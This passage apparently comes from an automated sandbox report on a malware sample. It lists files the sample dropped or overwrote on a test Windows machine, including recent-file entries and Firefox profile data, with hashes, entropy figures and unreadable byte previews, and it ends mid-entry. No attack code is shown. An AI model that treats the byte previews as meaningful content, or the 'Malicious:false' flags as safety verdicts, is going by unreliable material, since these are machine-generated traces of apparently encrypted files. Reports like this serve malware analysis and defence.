                                                                                                                          Preview:UMMBD.b@>.i..P...........,...,...)..#.bx'..+..>....G....Df#..u-(s....=.d-.d).........?!*........t...,;.O`._j..Z`..\...Z...r.{..e.E.j.zY.%.1m.Lc. QQTS.Q..v:.4..._h..&)D2x..p....x@8.........C!...g8..>>......U.%8.2.-.........\%.{.Y.....B..e..)..o&......D ..K..L...4A.N.....s...o*..E.<..2.S.2.29..._Ge........;..F..))p.....b.9...<w.[..2..9.$3......g...vs.....#.......5r..8h.#.I3Yz......R..pZ.../).k./....|T.F......+.....r.....hq[W&..O4.......1....JH.6.eN.m1....}.P.~Z\.#.cZm......sn.[M(....S.4.............."*.W\I.....3.Co.b.^...v...3.._j.5u..R.j.l..%.V..N...G.......y.....!....J.kCJ.?7LA^....y......+....y.u2.....<...J....=_.j.....r.5'...$......0......B.^^.C...TG......>..9-q....r...n...R...]o-..,.z.J.f.q......5.......1.G...P.iw....2.s!...H.....bK...F.....,.t...8.y.z....:.]=tS.v.......'t.v!E...o~..q.......{.4Z..j~.+.#rl.I.qV4h......d.).....s.#..2..3.....G...1 ^.......,... ........s,..?z......6{3..B...1...P%*0.|.c....Y..{..2.:....4.G..Z.....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UMMBDNEQBN.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.832474904227644
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:OpsJQW/5dSsGVkjFaXrqGNyObIvucPGxpSlzeMkVhAQsDc3sLViED++bD:ysuWPTaLgcIvuAC0lzenVh4w3WJ+8D
                                                                                                                          MD5:F70C48B8AB9EE885BFF4D1EAD0AC6578
                                                                                                                          SHA1:6EA84B7F0460043086F28BC4EDD1728AF37FC3D1
                                                                                                                          SHA-256:93DC5A1048604698C6EBD6E3BFFF9B89FF89E40CA410FC60E706947EE98CDB7E
                                                                                                                          SHA-512:CE97266B7655C3226E698AC7C62D428C2C67F9CEDF8AC24B2F70BFEA848CD48D2AA3562AAA969BB28993BA2D1F43FBC59AC69CD4FA6F00C0F08D3E4B428476C0
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD`.>......).i/5...t..E'....|.X.@...e!...\"*..l........ Qb.n...&..2..|A.,GR.x.j}........%...]Mi.Ae.....aW..vm...a:...ZSQ.8y......../0.r.xq..=.#...Z.s..H[......h.....6.lO.)N.6m.b...;>.[.......r.k=T..y D.'..}u...}B...m......~X..]$|s.}(.*2u../.Y..>HLp\..|..Nd.f=\.......u..05....N|.h-m..3..Ha&Lb.... ...@.G....Lk....}.n`.M.S...).....d...]l.;K7....Drf.....?.....v@_......=...>..L..y.....uO.*.?*..&..yNA..".Mo..Y..7.TvW..TY.;`.B.....gs..N.@CK....j..._..u..-.).u..8.(.{....q...E.~...F.....[.~RQ?..Z[\....~}....Q6E..P.#g.h4.....@.N...-q..<.e-.P2Y...\.........".....9.Z...8...wCU...Y...3......E(T#.zs.|...3..W.z.qJ..n.}.P....a%:H....0/..(.s2#..v.h..)!.4..$.L.~U.....~._.v8.[X..OIV+..u.t.Nn..3A.U..*...vN.x.ap.....g.CC..W.;..=+../.8.W.5}...>..o...8..W'..=3..inS..hp....a.8H.K........T.4.LU.F.!..V.Z.i.3...Zk.xz}...Mj.D$..E..X#m.0).....@..0....[.p....3....w.W...*...4'.jG..E..`Pv.qZ.PB.>Y^......#....m.......d...... .Z../...G^Z.*.h.j?.........T.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UMMBDNEQBN.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8660205828661836
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1gBIMFYIQopbqHX3dEN7hmL2FLnLrGfpQZMtRin6O2kAkTJkXfMUbD:1UIMW5GS3LL2tnLGQWtR3LLEifM+D
                                                                                                                          MD5:8757A0C1CC9F35DBF50AE98D10576382
                                                                                                                          SHA1:A8869CD390C3E9EB830899DAC918715955F75DEF
                                                                                                                          SHA-256:371429ADE7567FD52A46068E4415783174BEADB366F0FEA971C2CCEC0B26C05C
                                                                                                                          SHA-512:FD1F281C72BD5429D34C0428E708F8AFA0C1F7EF9EE1EC9227AEFA4B8ACA5DDD9C7ACE61B19361F2CF22B4648DAA841F02D158B1EA1B72E85E0131E1CFD671A1
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD......x.".:.>.'bE......;.:.|y....az............. .2}.i.$..?>..E...,P%5.s.ls.q81q.B]..i(..).. 7S.598.`.@_.C.N..f..$....C.&.r.0.....x..n..(.y..:.._..Sk..+."N....Jb.h.-.......>.~.y..qj........oZ.;7.pbFd...@C..)l..B.q..jL7..{b...b..a9...#*.z."b.|....lUUZ..8p.Z..j...9...c.(.E.z.]...+...1f~c.....IV4..W...g=j.=.=k2.v^....[.Ha;.'B._..RC..\...{F.A..>...rj#.....!X..9...5.....x.M.z....Z...YC..)'...F.`.W...Xx.XE.c...V<.S_DC..g.?....>/.k...x..~.n..O@..X=PPA....XK....}!6...,~../..8ju.rC..K.&...L....V.N>.p{X.bA..W...`Z6t.u6C.*..Q....n...0.7.D(..........RQ3{.o...y.M......os1..{^r. ..l.Q.~[...u._.....t....=d....1....{a.....A..=|..xf.P&.x..8k!..y.....H....."s.o."....i..<..Q...%...n.....0.H.Q./.....r;....z......FL.<....o......0.\.B.=.'*i:w+...m..v?P.|.~d}. ].;.I..M.k..%.=..J..wB.Y.cLy..[.sg.4kJt......%.~.,v..p.'....YTH[.b=..YW.... O.X.@.....2.....M!R....6....=vv(+Y...XZ%<.U..G...NO.%(..U%Y.\.e.8...m..o>dr.z.6...u5........>......5X?..Fm...._3.N.p}..-...

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UOOJJOZIRH.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.836940222827568
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:m1PF+GW3PwY2qfASZD25LDqaqSC3cOPJH91EONLNKZ6tsQGbD:yPFHeV2qfASZD2tqbF3cKdnN2HD
                                                                                                                          MD5:7595BE6B5C8E2AFA624C0AC376CE9869
                                                                                                                          SHA1:93EC6F98F34558F50BD4F994807BC87D7F25D65A
                                                                                                                          SHA-256:B714F4F76F24844247E1522C0C0068046CC8F54227B0814016FC0C2CC872731D
                                                                                                                          SHA-512:8A9BD5917E3509D2E0A0285C25B0A84408CA37DB019500D29E445AD334D4809BC255214C4ECC6B9BDAC20C8A941EF9F4305BE4B707802A76369BB470D2662B0C
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJ...$#v.~..v..O_A..r.EL<.sT."6z..s..T..y...}Q.fP..zC..w.bJ3.A.\y.Z.2b[..0f...B..W.t..z.\.n1}.....R......$.,k.o.:.Obj.%..F...r-es...i=.....D.....`..t....Y.P.!*4k..'.}.qa:qX..........J.4J\..4c.h..~.b.h......*....G(....$..0.S."C.....C......V....p.H<w.).OY.@..n4g...+.....+.[1..l5l..[....@..M%.D...T... P..L.O.$..../K..F..9......G=.....d!vS.....*$Xj.N...Uv.qT..@...,..u.2&....K..$M.*{.b>~I[..,.v..jc;....x...r.N...j".2S...s._..7j..%..MFM...+.4.w}...#...........KS5.}.(..:7.8Mr..c<:.(..M.....$-.........p....G3}.@@...M..C.]ED:.;..=P..+,.;.T......N_'..P@L#jt4..ad.....CO...1-^....?b...DzORe...;PbVD.2..-s6^.(Nr*..<.g...C&...4......c.Rf.....F..1...a.W.x.R..f.`..^..K..O.D)G(+.....H..@.6.......1..P.^.8.]2....k....%...iGM.Q..-e~l.S.Xs...7.b.3.q...,...63....x.N.>gRua.'....?C...%.2[wA.....K.....g..n.eI..o...Ur.:.J..`..|G].'...J5%r..~de..^~{.?...@.3H.J>.ucC.q1.[....*.l.l....._/.+t....S.[kj.u_>+.4... .m.T.X..^.v.S..a{F,....|...>:H.....F..@.NAS.c.@..>....zj

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VLZDGUKUTZ.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.830619532244673
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:z4AwK5VREtEvIoiiKq3VGN5qajVIUrlnIhs3cNBFdpK295cHe3zwbD:UALEmQoiitFGN5ZIenAsMbFmN6qD
                                                                                                                          MD5:EBC804AEA88ABA48A4CDFFC9119A0BA7
                                                                                                                          SHA1:ABBEDA370F4A7169C769720DCFEF1CC45012B30F
                                                                                                                          SHA-256:66C49381DCCA3908A73265880E8B1FFA47177596EF9D2D6E04BD28B866449C5B
                                                                                                                          SHA-512:3563D64BE645C13137685DF3B49D9187ADDBE22A69113F0ECF1B19730BAD09571C47FF21FFFBD002A68AB4CED020CF54686B4F060C95DE4468EEF0C85CCBEB2A
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG._.cKw/J.<....e.......2./].=qdy..r...7tR.3..v.....%n.0....BI@.I....6tN?..x`f. n.OO._.i)G..1).-.....x'u.Mar....H.Mr..r.f....!..|..J...ZD.>O....N.S.K...e.+F.G.7..{...b........5k..2^'...h.u...Q.GA..Nq.....c...$f.....&~.}..s..9...J.Q.B.h....<.5.......V_.G@j]w..."P|U0.6.:k3.....FN....Z)..x5.^D..Wg.CS.Q..*?..Q.....5O.0.N..ojh...Y.u.........r...........'..[x....A.......-Pr.O4.e_..lFR..vm...!'............#...VM.#A....U.......l.K....As3.h.14.....{.......O....1... ..2.E&..O.Q......E..Dt#-..t.Qp..f#i......_.I..'x..YEg..$..y..@...c..........b..,u.M..G...?.. +...L.Q}.2.0....t..D.O5....W.-=Q..V..............:...z.$.i./`.v$.....tk: .0...@.z.......o.{..v.............$.C.d.!.U..4H.....7...-gFqN..M..?..,..."...L.....e..1U...>.O.......wNP:...*...U..N...r[!..V.A...%.*.@3l..mu...C.-.S....wev........7nO.u...l..K...T.-. ..oy].~5.f..... ...).x....7{).`.... ...`^.fs.e/<.G.>K.3b.......{...<....;`^4....}n...m...7....^..P...b..O..CU,..W./....,.y...

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VLZDGUKUTZ.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856734222510161
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:76/orOdTVV9T/rEv2SjxHD+6XaIsAKLE43TtOTWYn0o74OgUFlEMbD:egWpXE3D+6KKs2nlgcltD
                                                                                                                          MD5:2D97D04896AC8160AE27BA3E6FFE8B78
                                                                                                                          SHA1:9C8976E4DEFCC7986ECA7CC9AFB0F4184F6BEDC6
                                                                                                                          SHA-256:2BB2766747B9B4A77FBC27A4BFD9776342D0A48F2A6FFD4A57CEF52A90C29515
                                                                                                                          SHA-512:9381B4253D4FDF124575F2B2960ACF199A35172A3E8E0CE247E757DAFB3A22CC585E99FAB3958658E7371A5A811F7EE29A57CD07A339A0B42927A7D998DAACAF
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG....Q2.'.+..l..z.r.../...J...!.m,.....R..~3..Y.2....[.;...E.....i/.=.....+........i..[?? .:^c2...t=...K.)..QJ.:tq.*\q...x.r.|..d..V8...v../. ...=..n.;..R.9.......9......v....X.|...Yi.g/.qjk..Fy.l.....#&].......y5...-.Hz@~....'.....s,..%uf#. <......)...,H.~.|Y..........s.).....?s...-.-^!.+.sR [..P.w<.9E~.Q..W..L3:......>.:.@.c.6...zK...... ...%.w..^l.c..`.......<,.T...{vx..Q.....:....83;&......<+.,.;..|iO.D..>...O.....J..7.V=&+=.=.."u5.%.chp.F{C.j..^....~.qY...?....".A..Z....)FQ0\..O...Nk.~..q.........aY.-.!#i*:M\T.T........Ec.;.5.7.,.Fu*6g.^h...P......t.B.2.X`t.....1..."..^.A.b\.]9..&ZJ...b..4...v.%#......iC..r..?....E\.t....i..v8.U.I.I.%.~ ...Y.5.%zT...xI....s.........?3.$@....R]qn.&L..^[d....1.0|H..Ty.l..y....Tvhd...#s.[.eJ.n..v.h}.....d..6R....@G.E ^.A.....g.../.b..[3i{..,..-jH..D.l......t.."..ji..m0H)#.')......V5..J..T.. ..!q.......f...=..w].....&...Z.#..%_.!..1Z&L..G.g.t..*..T C....w.w.t. ....=.m.V.@....k.l.".......z.m.....8m

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WKXEWIOTXI.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.811972039271056
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Ymmjdoln/zI/cihlGIivBVRoHNSqIfDrb7bXLeXGashDOfz36rHVAGbD:KdWnUjG/vrRoHGXvXLeXzqKLwH9D
                                                                                                                          MD5:FFFE37E6815F84A8ABDCEF4621838E9C
                                                                                                                          SHA1:2D1C2B0E478753BFFD6D9B593A88875ECE6E6636
                                                                                                                          SHA-256:F924D089E4038AA71DF0C33B8C3DD4FECFB55B35577CCE6DC1450411D1C22423
                                                                                                                          SHA-512:11EDDB54858AAFA00F3AFD157921C23DA1A9CD575ABEBB4701B892F1AD73BB1E1EC5DEC379406F87A9DD84AD09BED717DF64142C2DDA2BDF41C40ADE80E77B4A
                                                                                                                          Malicious:false
                                                                                                                          Preview:WKXEW.;......%4l..U..9_.>.9J.?..u<.qt.m..,.......Nn%-...Z.#Z..?.A.A..(.vk.....H.{....i#iLb'......f<+...vi...:.F{.!M|.22..6G..u.^....M.t1...?....W....D......FR.9..[[.....cxfp.5..j.^...ar..N.PC.M.=..zp~Y..N.....k.1._.L........]..z...}K.....?/.:.i).mDF.........l{.jf*2...F9q.Z7.N.Pg^<@'.......8QmX[.p..2.7w..J...\.p*.yR...K...y.1.%B}|..Q.!>H..-/3.....+.p}.Z.e.......NS=....{*..m?....{.#..p../V.76.}V.S...9.L.H....%...z.>.=8..j..;...f...p...p..T..7...8.r&..Yr..kM.t.\R.j.[h.U=3p..N...y.......\L.%.lE...G...a^k.a*..F...9.Y...8..f.Z.K|.l.._...@.XiAt.w..'...GL't+7..{.o.C<.........n....v#|4q4._.sS.?.28....J..I5.....l.i.&[(5...\..E$6"..'.>.n..I.SD.4.B...2b'.vFu*=(....}..J..U`.an..FB..b..K...[...b.WJ1x..3..<.^.c....).z.M|...).u.e?{.........ue...W4....r.t2^.. ..i-H...R....S_......g..!.8S..Q<..@y..8.4.{..H_..\}Q..9.J.c......}.....f..{...u..g..S.:b_.-v....7.n.q?.q......U}..%...et0....?^P./..-..,.:T&..!.<...A..bLt...=.....n.`r........O...iC}..\..j.&$

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WUTJSCBCFX.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.82580670006501
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:99+LRF8MIhkJGG+WBi+aSj3EoRMIUkGz+hZXHcm7WL9C+GPWs3/cckLHZIjbD:MRFjXj+GilUKBlzcZHW2UcUZyD
                                                                                                                          MD5:449E3CC81BD545C7344F255C9EE94AD6
                                                                                                                          SHA1:F9010DDB4B2E6FD1568E133401AC21A4B4923801
                                                                                                                          SHA-256:1A2E9C35AF478BB4E84F1AE5EBAF94702D52BAF764263548C9310DA6EE23FE72
                                                                                                                          SHA-512:23368F6CA3C49C79219149A306EB40557DA562E55BB8CA69E2867A668E51CB6A3E2DD99D26B470AF007E90603AD4B9857DB2839DBAE5209E74279043B4DA0C31
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJS.i.H..Y.}.Z........U.7...^Y....*.n.... ...5J)..O.QV.4...o.-.|...~.....l.K....t....'..7C..Wm?eO..]=H..}..0y.c..%.&%.K.........'.B....nro..&O....._S......u...I..u(..`..../5....m..-W@.......u@.U7..fuuu..P'n..y...o...2A...f.Z,..i.Cz.}$s..C..;^.?....._..3.Y..`.~..C/<... .g.y....@.......T....f..q=.......\..6 W.,.3..$.......<*...4>z...Ri..z=E.#X....C.@C.._.8. 4[,.|..Z.K.. .F.."..'D.'.m..}AZ..D.9...K.%...d`&..e....i.B.....F..8~.....|}).EfAC...h^.Q8...._.......H..G._Va.$H.....,.G...a.....i..S.z....B.?..}m6.......,..}.....T...kq....QZ......'.k!..Z(....,.....c.&D&.....b.cx..P.n..x...<.. ...b.ae4..i.d.cF[.....4k"...%..u...........9.i..D...C.H.>.....;...bN.....r...*..,L..[.. _.Vd.]K.p....h{1.I.8.<..|.@.n.kg.1.\K0"...0..y.'.:b..=.D..D_..`_.d.E5?#Wb.....G..9,.........<T..H.h....S[..L..%1d....'t...M......P8..(0.=.A.."...}"....*R.a..q9.:..nV!D..4.J.y.........\...w...m.5\....I..=t....{s.....@'...fG_.ze|-..^.18.=G..k3..4.)..Un|..}.g.iEu.z.....|

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\XZXHAVGRAG.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.839041912243269
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DvvOwua/v7H3Gs0Yeu5mzQEGCx3xSWh11SuIosm6/TNXbsjHbD:7vOwJjGsFJmURCxBSWU7osm6/T1bu7D
                                                                                                                          MD5:0AAB5CC1E8F5C53F86D8C3F28971177C
                                                                                                                          SHA1:55963E410B8E3F667541EDF7D9288DD53C4529FF
                                                                                                                          SHA-256:13BE38C60AF97E9D2C6419BCD90F9A73D67184DE7976CFB6DE2670D00FF97C5C
                                                                                                                          SHA-512:6AB34027C8C47FDBAF2FF530F2B88A6629096BE60A67C75914D229FB0187393F76212A34001671D85573B3066BFF8282F7B6CCF9586E96754743264383DA7280
                                                                                                                          Malicious:false
                                                                                                                          Preview:XZXHA .*....P]....2+H...U.?m4J|.t.....Q|..J;3...G..N.2.......2...c5y.lv;.t....~.{E.Y.k.4...jd...Z.[..0..F.5..S.{...jlK8.7Aazn.uJ.4..\.A(....EBi.v...(..>ma.;.c..... \ .I....7....}.m<..v..vRs........4...y?....%.u..E...A>...i.q..gE.#u^..C.:.S\..u..I47;.6.B.%tG.. ...uj.6v.b.}Tu..Rs..f.f..KVl.mEf..cyb...........w%4..b..N.l..-.'.......kU.[{.o..a)........l..20.A.U...Rs..qJ...}(...fW........HW..<jT....r.O2v.n:..3...j.......g*Y*C...[.......a..R.s'.%.F..6.:C.<.t..e.c+.Q..f.......!.r.......~.a(}...{........k.......5\..>...C]0..(.Z..|..W.U....*U.(j..Zb......,......U. ...q..[..K...;yiD...!..D.p.*. .. ...._.38.93...w.5eb..`!..{.c.....x..Pq.Q.!..bs....._a._K..vn...C.......E...v....(.^.n..f..R.#.....7.=.....g.h..oi....*.z#.1.V5......._......>....:..W...t2..@.........!.+.{B.A)mG..s.L...}...&.#.x._.2W...o.......>....6.N.....f....tDtc..N....C.y.W6.^L3.D.=76(.A...p....>..k.'..T.y...r.......`..Y[.....'.. .\....bD..0.1CS.l;'.....t....Z....._H...^..E..Pe...

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):495
                                                                                                                          Entropy (8bit):7.506713392211262
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YWh8fh2i7f1f7hp5N/U8QlrWpbZWU6HsVg2q5bTcii9a:Y4i797v5xUfWaU6HBbD
                                                                                                                          MD5:8A9D5048C6C6266112C39CF077563C52
                                                                                                                          SHA1:A7E00AF7BC7207C5A0C188AE0FDA212774B9E97A
                                                                                                                          SHA-256:D2FBEC470DFFC598401C61821552EDC3641C6034F6FE1EF3B52527E6BC2E1574
                                                                                                                          SHA-512:AE0F33B73A831DC53921A2E1619F7E7C01E4C9CC201C94E2788592321585E9E1EF27586118141A54499EFC2B701E639360DD10991D712365284421A250A8B899
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"ses...o...Hm..."...;.hD.m....u.C.........`.)c.,r...M.....R:.....X...@..c.....`...$.......4......1.....: ....w...z.f...-......}..LF.wY>........5..... 3.\G........c^..}tI)......p..B....C.|.Y.<Q.H..7.s.\`.2.=.E../. .G....03..'7....)o.......E.E.q..P.*....TL.%..y=./.$._..#~...VY.....^e..9.M.a.d~.mk..d..Nk.z.J.pb{E......x...q...;.$cb..']..s#...|.+...^.....,...)d.[l"Tp."=FRd.'G}oG[.W.o.@@....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):385
                                                                                                                          Entropy (8bit):7.369455464061734
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YGfdbpwmIkpUUybQH5fdcX/0YqwMveXq5bTcii9a:YoI3UIA5i/OVbD
                                                                                                                          MD5:27E2208EDC12C4E18DAC98D281FB538A
                                                                                                                          SHA1:3A2E28E97602FEFA0238A913C4416B97E26943D8
                                                                                                                          SHA-256:7465C53F8718E50D56664004659465F577010939EF9CB097A68B24BD67C2D82A
                                                                                                                          SHA-512:7589FDDDF11E935DF532ABF5E53E9A9AC6F2EBD03757F6ECC69D75566F18AA00361185C514A99A89CCE44C21FF619C587F3546D3296399A7073FE2D2D30C4A08
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"cli.....JQ6......upK.....+....t;b....m...V..Vm.le..kCAG.q).1.5: .'....2Z.>..m`..n.n..,Mn.>..4..W.^c&}..kD.>7B..a.V..5.q..T.0|+d..._.+...U|.L3_...s.../.4...)..u..2.:.b.v."...q.......F.c:N.......1.q.CO$...z........r.#.8. K..$.W#.Mky.......mQ...F.j..2_.7o.n5.@...z.....H%.Ys,w..a.(.D..N4..6.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1550
                                                                                                                          Entropy (8bit):7.855288898725212
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Bl5xCtflfo8Sh2KBSiwxqWRdQLQQoEPoRGvC0qfD:BbxMfPShXwiwtR+0QzUGvC0qL
                                                                                                                          MD5:46812834D1ED73D770C359850DB26163
                                                                                                                          SHA1:D85BA21F4AF0A3F920FD55414FB0682F725B2B09
                                                                                                                          SHA-256:65C6DB54AC8023E84B7CB98F2C98EF7889BA66FDFF45AFD4AFDD2A365996086A
                                                                                                                          SHA-512:F88C7E1FF2A203F0B4E030932A07B298A5FAF01A56890A0BD87F43663A5C2CA52724318214892CE00D0039958BA061C396997B226CAEDF7B76B555FBB0E35847
                                                                                                                          Malicious:false
                                                                                                                          Preview:mozLz*..........W..].3....CX.........[...6.)a....z]5U<......7.).p.......v.4..b.?.th..Nu......._..u.`*d|..%u..s..:o..c@..&..~....o....X.q..*#...W5.R@iA.............l..`.....2 r..=.....H\9>.8}yD.q?$L..]..M.gH}..-.. .]...`.g5.^+...6X2..m........:B\a.~. ..&......5%..|.....N..q/X...u..JX.@.Dj.......N9..B......6...0..evW.|.G.z.%&.:.4j.,.....f.`...#.x&...].1`.g...jw.&.b.......B.)......O95L.......p@.fpC.`..0..{h.k.r...(r...C.R...".dR.=W.N....V...Y ...*...]b.e4w...cm...q.k..{Z.RJ..}.l.^C.u.D.....B.}T..'Fv......$r.J.RZ..........`li..uq...6k...qD..L.......Jj.uX....M..D..&s.#`.E.5.....m..VK...3+..W.....q....*Fu.(...f..b.t.V...`}ZHz:5|...].U....L$A......{57.h:p...U.]`.D.h.Q'2.v..4...r...8...\f.t.N..?P.`....GX..8._.W.%#.Yz....Pd....m...x..g.b.....H..n.....'.....5.|U.C.|p.......4y.a.)..Dv..L......[..X.cv.kR.......`.$.B.W.pUyCK.....!;.o.Z..qYk..8..-.)..S..,..b.7]...H..A...)7&.....I.J..1.la.Fnp}..NV....v.Rb.43.a....+.=..,*[..B....dt....

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4749
                                                                                                                          Entropy (8bit):7.960435355898811
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:ZPIAFQhRiMrQfn4+LxsjFcFzEv97oH7aM5ZpHn:VIASRiaR6xQcFgv2+Kbn
                                                                                                                          MD5:CB848E34C0F4A311EE9946276116CFE9
                                                                                                                          SHA1:960D7FADB1704E363F3BD6560F39A2F020CC2454
                                                                                                                          SHA-256:7DF2B34296EDA74B0228FDF74E2B4D39B75618A5C37F0A33196FDD8CBE9F1ADB
                                                                                                                          SHA-512:EC18445CDC8021EF667E061908512097A692C33AFEB7335E7EECF28B2624B336A733AF90B096DDB8342BA0E964344C6FE0E2DFAFE26C810C5C26DE44B170785B
                                                                                                                          Malicious:false
                                                                                                                          Preview:mozLz./;.'\K}'.B...{n!...e....zr...y$...Da..5....L....g.b.T.....1....G(.3...`.t....jqQ....._B...&.............~...p...>r.hZ...A....n....%..`......C.Y............m. .u3.0v.s.....<0..P6.7..5.xU......B....\uU.T....>.$...B..*r`"oc}L...h.T....f.0.M..WD(n.|p....-A!....\t.u..ZM.......G...ER.....i.v...b.../..1..g.3/..0..^.I,.u...D.....0.g......C.......q+.W.Lz..-n.lb2`@.....;..p.\.....n..~..y5."..|:'.....~.........D..LJ.p.:.S...JbF4N..,....rx..yYx.._.."`|@.n..8..y.$+..E..y...kD.....G..c.}...e|?.u(...`.V......Y..aK.M....C.../..+..|.N..y....+D%B...._^C.......e....o....E.].LX.RzOFB..'."o..7.....~L .Ts.T...z...gn..|...S:u..^.......\p..<{.#U...I.p.n.2a../..uF...j..........M...6K`.S@.....q..mCk....r."..."F.../i.B.KF!......v.3|.G..4. ....'!......F.2.....9l.l....;.I..S./....\.m..3o..s.P.'...K....Q.4R...Pu..5.aJ.8h.Az.....nBt@f......:..-..r......t-...*.....M0..].;..aUI......+[..*+.....>.>........CA.....RLSJ.'...#v.O#}.......h.(k.y.+..`.....+..Ys.....

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131406
                                                                                                                          Entropy (8bit):7.998531113820308
                                                                                                                          Encrypted:true
